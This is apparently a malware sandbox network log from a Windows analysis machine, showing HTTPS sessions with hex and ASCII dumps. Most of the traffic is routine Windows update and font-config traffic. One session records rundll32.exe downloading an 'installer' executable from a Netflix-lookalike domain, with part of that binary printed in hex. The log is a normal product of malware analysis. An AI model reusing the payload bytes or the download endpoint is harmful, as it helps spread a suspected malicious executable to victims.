                                                                                                                                                                                                            2024-05-01 09:08:19 UTC1369INData Raw: 20 50 68 ec a2 40 00 53 ff 15 14 80 40 00 53 53 8d 44 24 24 53 50 53 ff 74 24 28 c7 44 24 34 01 00 00 00 c7 44 24 40 02 00 00 00 ff 15 00 80 40 00 6a 04 e8 1d 2e 00 00 3b c3 be 02 00 04 80 74 0c 56 6a 25 53 53 53 ff d0 85 c0 74 0d 56 6a 02 ff 15 4c 82 40 00 85 c0 75 07 6a 09 e8 3d da ff ff a1 0c 03 47 00 83 f8 ff 74 04 89 44 24 10 ff 74 24 10 ff 15 70 80 40 00 a1 18 a0 40 00 56 8b 35 20 81 40 00 83 f8 ff 74 0a 50 ff d6 83 0d 18 a0 40 00 ff a1 1c a0 40 00 83 f8 ff 74 0a 50 ff d6 83 0d 1c a0 40 00 ff e8 29 00 00 00 6a 07 68 00 90 4d 00 e8 d4 20 00 00 5e c3 56 8b 35 ec 66 43 00 eb 0a ff 74 24 08 ff 56 04 8b 36 59 85 f6 75 f2 5e c2 04 00 56 8b 35 ec 66 43 00 6a 00 e8 d7 ff ff ff 85 f6 74 1a 57 8b fe 8b 36 ff 77 08 ff 15 68 81 40 00 57 ff 15 28 81 40 00 85 f6
                                                                                                                                                                                                            Data Ascii: Ph@S@SSD$$SPSt$(D$4D$@@j.;tVj%SSStVjL@uj=GtD$t$p@@V5 @tP@@tP@)jhM ^V5fCt$V6Yu^V5fCjtW6wh@W(@


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.44974923.221.242.90443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:24 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                            2024-05-01 09:08:24 UTC754INHTTP/1.1 200 OK
                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                            X-CID: 7
                                                                                                                                                                                                            X-CCC: US
                                                                                                                                                                                                            X-Azure-Ref-OriginShield: Ref A: 8BFC17DD061B46CAAD2B2AEB7B19C3D8 Ref B: CH1AA2040901011 Ref C: 2023-07-21T06:04:00Z
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 1421F39FA7224BE199CC2F2C3DD24574 Ref B: CHI30EDGE0415 Ref C: 2023-07-21T06:04:00Z
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                                                                                                            Cache-Control: public, max-age=165312
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:24 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.44975023.221.242.90443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:24 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                            2024-05-01 09:08:25 UTC774INHTTP/1.1 200 OK
                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                            X-CID: 7
                                                                                                                                                                                                            X-CCC: US
                                                                                                                                                                                                            X-Azure-Ref-OriginShield: Ref A: 8BFC17DD061B46CAAD2B2AEB7B19C3D8 Ref B: CH1AA2040901011 Ref C: 2023-07-21T06:04:00Z
                                                                                                                                                                                                            X-MSEdge-Ref: Ref A: 1421F39FA7224BE199CC2F2C3DD24574 Ref B: CHI30EDGE0415 Ref C: 2023-07-21T06:04:00Z
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                                                                                                            Cache-Control: public, max-age=165311
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:25 GMT
                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                            2024-05-01 09:08:25 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.44974813.85.23.86443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:24 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kPRasndGkvlenHk&MD=zHV46mV7 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                            2024-05-01 09:08:25 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                            MS-CorrelationId: 11447ce3-14e3-4c41-8361-e1e388f1d3e5
                                                                                                                                                                                                            MS-RequestId: 7ff7f84b-3ccb-473a-b50a-d1204e3c54a3
                                                                                                                                                                                                            MS-CV: 4dBkJGHJZES/Pb4U.0
                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:24 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                                                            2024-05-01 09:08:25 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                            2024-05-01 09:08:25 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            10192.168.2.449756172.67.152.1514438660C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC179OUTGET /downloads/winapp/latest-installer.exe HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999
                                                                                                                                                                                                            Host: files.nflxso.ca
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:28 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 7055674
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            last-modified: Wed, 23 Nov 2022 20:15:22 GMT
                                                                                                                                                                                                            etag: "637e7f5a-6ba93a"
                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 22
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UyKE%2FgNExIOZKL9UkwziU%2F9nZo6ZojExcv8%2Bp%2FVgWJTPBbj5EkHZ0rBgpWeqa4xwIYckngSYktq9FIAc5zxNOj4rmvviLzWB7dhYuKvXYYcVzHHoOkdxdl%2F4BJljLlUSRjs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 87cea08ede8820c9-IAD
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC666INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 7f 15 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 8a 06 00 00 40 00
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELy\f@
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC1369INData Raw: 18 ff 15 18 82 40 00 85 f6 7d 92 33 c0 5e c2 08 00 b8 ff ff ff 7f eb f5 8b 44 24 04 8b 0d 54 02 47 00 6a 00 ff 74 81 6c e8 69 ff ff ff c2 04 00 68 d8 e5 40 00 ff 74 24 08 e8 1f 40 00 00 c2 04 00 55 8b ec 81 ec d4 02 00 00 53 56 8b 75 08 57 a1 48 02 47 00 6a 07 59 8d 7d d4 f3 a5 8b 4d dc 8b 55 d4 bf 00 10 47 00 89 45 f8 8b 45 d8 33 db c1 e1 0e 03 cf 8b f0 89 4d f4 8d 4d d8 c1 e6 0e 89 0d 34 e6 41 00 8d 4a fe 03 f7 83 f9 43 89 5d fc 0f 87 3b 16 00 00 ff 24 8d d7 2a 40 00 53 50 e8 b8 3f 00 00 e9 5a 0e 00 00 ff 05 0c 82 46 00 39 5d f8 0f 84 4b 0e 00 00 53 ff 15 94 82 40 00 e9 3f 0e 00 00 50 e8 af fe ff ff 48 53 50 e8 c3 fe ff ff e9 05 16 00 00 53 50 e8 7e 3f 00 00 e9 ee 15 00 00 53 e8 42 17 00 00 83 f8 01 59 89 55 b4 7f 03 33 c0 40 50 ff 15 78 80 40 00 e9 d0
                                                                                                                                                                                                            Data Ascii: @}3^D$TGjtlih@t$@USVuWHGjY}MUGEE3MM4AJC];$*@SP?ZF9]KS@?PHSPSP~?SBYU3@Px@
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC1369INData Raw: e8 a9 41 00 00 e9 6f 11 00 00 6a 01 e8 e4 12 00 00 50 e8 9b 4a 00 00 e9 2a 0c 00 00 6a 02 e8 b0 12 00 00 6a 03 89 45 b0 89 55 b4 e8 a3 12 00 00 59 8b f8 8b 45 b0 59 6a 01 89 7d cc 89 55 d0 89 45 08 e8 ae 12 00 00 50 89 45 c4 e8 62 4a 00 00 39 5d b4 66 89 1e 75 03 89 45 08 39 5d 08 0f 84 15 11 00 00 8b 4d cc 3b cb 7d 0b 8d 3c 08 3b fb 0f 8c 03 11 00 00 3b f8 7e 02 8b f8 8b 45 c4 8d 04 78 50 56 e8 13 4a 00 00 39 5d 08 7d 0e 56 e8 1e 4a 00 00 01 45 08 79 03 89 5d 08 8b 45 08 3d 00 20 00 00 0f 8d cf 10 00 00 66 89 1c 46 e9 c6 10 00 00 6a 20 e8 3b 12 00 00 6a 31 8b f0 e8 32 12 00 00 39 5d e8 50 56 75 12 ff 15 04 81 40 00 85 c0 75 7c 8b 45 e0 e9 a8 10 00 00 ff 15 1c 81 40 00 eb ec 33 ff 47 57 e8 08 12 00 00 68 00 20 00 00 56 50 89 45 08 ff 15 24 81 40 00 85 c0
                                                                                                                                                                                                            Data Ascii: AojPJ*jjEUYEYj}UEPEbJ9]fuE9]M;}<;;~ExPVJ9]}VJEy]E= fFj ;j129]PVu@u|E@3GWh VPE$@
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC1369INData Raw: 8b 45 e8 89 45 80 8b 45 f8 89 45 84 8b 45 e4 89 45 98 66 8b 06 66 f7 d8 1b c0 89 5d 8c 23 c6 89 45 88 66 8b 07 66 f7 d8 1b c0 c7 45 94 00 90 4c 00 23 c7 89 45 90 8d 85 7c ff ff ff 50 e8 2d 3b 00 00 85 c0 0f 84 9c 09 00 00 f6 45 80 40 0f 84 cc 0b 00 00 ff 75 b4 e8 72 49 00 00 ff 75 b4 eb 47 53 e8 35 0d 00 00 8b f0 56 6a eb e8 3a 35 00 00 56 e8 b5 3a 00 00 8b f0 3b f3 0f 84 65 09 00 00 39 5d e0 74 21 56 e8 42 49 00 00 39 5d dc 7c 0b 50 ff 75 f4 e8 f0 43 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 20 81 40 00 e9 6d 0b 00 00 6a 02 e8 e2 0c 00 00 50 e8 c6 47 00 00 8b f8 3b fb 74 13 ff 77 14 ff 75 f4 e8 b9 43 00 00 ff 77 18 e9 ef f5 ff ff 8b 45 f4 66 89 1e 66 89 18 e9 ff 08 00 00 6a ee e8 ae 0c 00 00 8d 4d b4 89 45 d0 51 50 6a 09 e8 20 48 00 00 ff d0
                                                                                                                                                                                                            Data Ascii: EEEEEEff]#EffEL#E|P-;E@urIuGS5Vj:5V:;e9]t!VBI9]|PuC;tEV @mjPG;twuCwEffjMEQPj H
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC1369INData Raw: 00 00 6a 02 50 57 c7 45 fc 01 00 00 00 e8 c1 08 00 00 3b c3 89 45 08 0f 84 aa 06 00 00 33 c0 83 fe 01 bf d8 25 41 00 75 11 6a 23 e8 13 08 00 00 57 e8 ca 3f 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 db 07 00 00 59 a3 d8 25 41 00 56 89 55 d0 58 83 fe 03 75 0f 68 00 c0 00 00 57 53 ff 75 e4 e8 73 0d 00 00 50 57 ff 75 b4 53 ff 75 c4 ff 75 08 ff 15 28 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00 68 19 00 02 00 e8 f3 07 00 00 6a 33 8b f8 e8 aa 07 00 00 3b fb 66 89 1e 0f 84 e9 03 00 00 8d 4d b4 c7 45 b4 00 40 00 00 51 8d 4d 08 56 51 53 50 57 ff 15 2c 80 40 00 33 c9 41 85 c0 75 2e 83 7d 08 04 74 13 39 4d 08 74 06 83 7d 08 02 75 1d 8b 45 e8 89 45 fc eb 74 ff 36 33 c0 39 5d e8 56 0f 94 c0 89 45 fc e8 41 3e 00 00 eb 66 66 89 1e 89 4d fc eb 5e 68 19 00 02 00
                                                                                                                                                                                                            Data Ascii: jPWE;E3%Auj#W?DujY%AVUXuhWSusPWuSuu(@u]uhj3;fME@QMVQSPW,@3Au.}t9Mt}uEEt639]VEA>ffM^h
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC1369INData Raw: 15 28 81 40 00 ff 75 c4 57 ff 75 08 e8 28 36 00 00 57 ff 15 28 81 40 00 53 53 ff 75 08 6a ff e8 5b 08 00 00 89 45 d0 ff 75 08 ff 15 20 81 40 00 39 5d d0 6a f3 5e 7d 13 6a ef 5e ff 75 c8 ff 15 40 81 40 00 c7 45 fc 01 00 00 00 56 e9 a3 f8 ff ff 53 e8 71 02 00 00 8b f8 59 3b 3d 8c 02 47 00 89 55 b4 0f 83 cb fe ff ff 8b f7 8b 45 e0 69 f6 18 40 00 00 03 35 88 02 47 00 3b c3 7c 19 8b 0c 86 75 11 83 c6 18 56 ff 75 f4 e8 02 3a 00 00 e9 da 00 00 00 51 eb 7a 83 c9 ff 2b c8 89 4d e0 74 10 6a 01 e8 20 02 00 00 59 89 55 b4 89 45 dc eb 10 ff 75 e8 8d 46 18 50 e8 f6 39 00 00 80 4e 09 01 8b 45 e0 8b 4d dc 89 0c 86 39 5d e4 0f 84 9b 00 00 00 57 e8 4d e7 ff ff e9 90 00 00 00 53 e8 e4 01 00 00 83 f8 20 59 89 55 b4 0f 83 43 fe ff ff 39 5d e4 74 25 39 5d e0 74 0f 50 e8 41 e8
                                                                                                                                                                                                            Data Ascii: (@uWu(6W(@SSuj[Eu @9]j^}j^u@@EVSqY;=GUEi@5G;|uVu:Qz+Mtj YUEuFP9NEM9]WMS YUC9]t%9]tPA
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC1369INData Raw: 35 dc a6 42 00 eb 76 39 35 dc a6 42 00 74 08 56 e8 39 39 00 00 eb 66 ff 15 7c 80 40 00 3b 05 50 02 47 00 76 58 39 35 48 02 47 00 74 2d f6 05 14 03 47 00 01 74 47 e8 87 ff ff ff 50 8d 45 80 68 80 a0 40 00 50 ff 15 90 82 40 00 83 c4 0c 8d 45 80 50 56 e8 48 25 00 00 eb 23 56 68 f3 2d 40 00 56 6a 6f ff 35 40 02 47 00 ff 15 88 82 40 00 6a 05 50 a3 dc a6 42 00 ff 15 68 82 40 00 5e c9 c3 55 8b ec 81 ec 2c 02 00 00 53 56 33 db 57 89 5d fc 89 5d f8 ff 15 7c 80 40 00 be 00 d0 4d 00 68 00 20 00 00 05 e8 03 00 00 56 53 a3 50 02 47 00 ff 15 88 80 40 00 6a 03 68 00 00 00 80 56 e8 6b 2f 00 00 8b f8 83 ff ff 89 3d 18 a0 40 00 75 0a b8 b8 a2 40 00 e9 45 02 00 00 56 be 00 d0 4c 00 56 e8 52 34 00 00 56 e8 6d 2d 00 00 50 68 00 10 4e 00 e8 41 34 00 00 53 57 ff 15 84 80 40 00
                                                                                                                                                                                                            Data Ascii: 5Bv95BtV99f|@;PGvX95HGt-GtGPEh@P@EPVH%#Vh-@Vjo5@G@jPBh@^U,SV3W]]|@Mh VSPG@jhVk/=@u@EVLVR4Vm-PhNA4SW@
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC1369INData Raw: 41 00 03 4c 24 14 85 c9 0f 8f 25 ff ff ff 53 53 50 ff 35 1c a0 40 00 ff 15 44 81 40 00 eb 0e 83 c8 ff eb 13 6a fe eb 02 6a fd 58 eb 0a 6a 01 e8 51 fa ff ff 59 33 c0 5f 5e 5d 5b c2 04 00 ff 74 24 08 ff 74 24 08 ff 35 18 a0 40 00 e8 07 2b 00 00 c2 08 00 6a 00 6a 00 ff 74 24 0c ff 35 18 a0 40 00 ff 15 44 81 40 00 c2 04 00 56 be 00 50 4d 00 56 e8 fc 31 00 00 56 e8 ae 28 00 00 85 c0 75 02 5e c3 56 e8 2b 28 00 00 56 e8 04 25 00 00 56 68 00 10 4d 00 e8 6a 2a 00 00 5e c3 81 ec d4 02 00 00 53 56 57 6a 20 5f 33 db 68 01 80 00 00 89 5c 24 14 c7 44 24 10 30 a2 40 00 89 5c 24 1c ff 15 ac 80 40 00 ff 15 a8 80 40 00 25 ff ff ff bf 66 3d 06 00 a3 4c 02 47 00 74 11 53 e8 d8 32 00 00 3b c3 74 07 68 00 0c 00 00 ff d0 be b0 82 40 00 56 e8 52 32 00 00 56 ff 15 50 81 40 00 8d
                                                                                                                                                                                                            Data Ascii: AL$%SSP5@D@jjXjQY3_^][t$t$5@+jjt$5@D@VPMV1V(u^V+(V%VhMj*^SVWj _3h\$D$0@\$@@%f=LGtS2;th@VR2VP@
                                                                                                                                                                                                            2024-05-01 09:08:28 UTC1369INData Raw: 10 80 40 00 85 c0 74 34 8d 44 24 20 50 68 ec a2 40 00 53 ff 15 14 80 40 00 53 53 8d 44 24 24 53 50 53 ff 74 24 28 c7 44 24 34 01 00 00 00 c7 44 24 40 02 00 00 00 ff 15 00 80 40 00 6a 04 e8 1d 2e 00 00 3b c3 be 02 00 04 80 74 0c 56 6a 25 53 53 53 ff d0 85 c0 74 0d 56 6a 02 ff 15 4c 82 40 00 85 c0 75 07 6a 09 e8 3d da ff ff a1 0c 03 47 00 83 f8 ff 74 04 89 44 24 10 ff 74 24 10 ff 15 70 80 40 00 a1 18 a0 40 00 56 8b 35 20 81 40 00 83 f8 ff 74 0a 50 ff d6 83 0d 18 a0 40 00 ff a1 1c a0 40 00 83 f8 ff 74 0a 50 ff d6 83 0d 1c a0 40 00 ff e8 29 00 00 00 6a 07 68 00 90 4d 00 e8 d4 20 00 00 5e c3 56 8b 35 ec 66 43 00 eb 0a ff 74 24 08 ff 56 04 8b 36 59 85 f6 75 f2 5e c2 04 00 56 8b 35 ec 66 43 00 6a 00 e8 d7 ff ff ff 85 f6 74 1a 57 8b fe 8b 36 ff 77 08 ff 15 68 81
                                                                                                                                                                                                            Data Ascii: @t4D$ Ph@S@SSD$$SPSt$(D$4D$@@j.;tVj%SSStVjL@uj=GtD$t$p@@V5 @tP@@tP@)jhM ^V5fCt$V6Yu^V5fCjtW6wh


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            11192.168.2.44976013.85.23.86443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:09:06 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kPRasndGkvlenHk&MD=zHV46mV7 HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                            2024-05-01 09:09:07 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                                                                            MS-CorrelationId: a6d27169-6025-4d16-8a97-472432c4cdb5
                                                                                                                                                                                                            MS-RequestId: f8adda2f-0047-467e-afca-3c9c7180daf0
                                                                                                                                                                                                            MS-CV: 5DYQ+1zv8UKY0n2P.0
                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2160
                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:09:06 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 25457
